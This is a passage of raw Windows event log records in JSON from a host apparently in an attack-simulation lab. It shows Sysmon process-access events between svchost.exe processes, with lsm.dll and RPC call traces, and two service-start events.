05:51:30.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76853,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 05:51:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76854,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 05:51:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
